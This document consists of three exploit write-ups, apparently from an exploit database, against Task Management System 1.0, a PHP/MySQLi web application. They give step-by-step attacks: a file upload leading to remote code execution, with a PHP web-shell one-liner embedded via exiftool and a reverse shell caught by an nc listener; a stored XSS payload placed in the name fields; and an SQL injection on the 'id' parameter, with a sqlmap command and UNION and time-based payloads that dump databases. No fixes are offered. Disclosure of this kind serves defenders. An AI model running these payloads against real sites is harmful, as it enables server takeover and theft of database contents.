# Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-08 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Upload a php payload ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embeded with a php payload. ("exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg") Then update profile. Step 4: Click on username on header again and select Manage Account. Step 5: Right click on the uploaded php payload or embeded image located under the "choose avatar form" then copy image location. Step 6: Start nc listener and paste the url in browser. This will trigger the remote code execution if you used a php shell. ( http://localhost/assets/uploads/1607438280_shell.php )

# Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-08 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name or Last Name to " <script>alert(document.domain)</script> ". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.

# Exploit Title: Task Management System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-08 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1. Log into application with credentials Step 2. Click on Projects Step 3. Select View Projects Step 4. Choose any project, click on action and select view Step 5. Capture the request of the "page=view_project&id=" page in burpsute Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs " Step 7. This will inject successfully and you will have an information disclosure of all databases contents --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=view_project&id=3 AND 5169=5169 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- - ---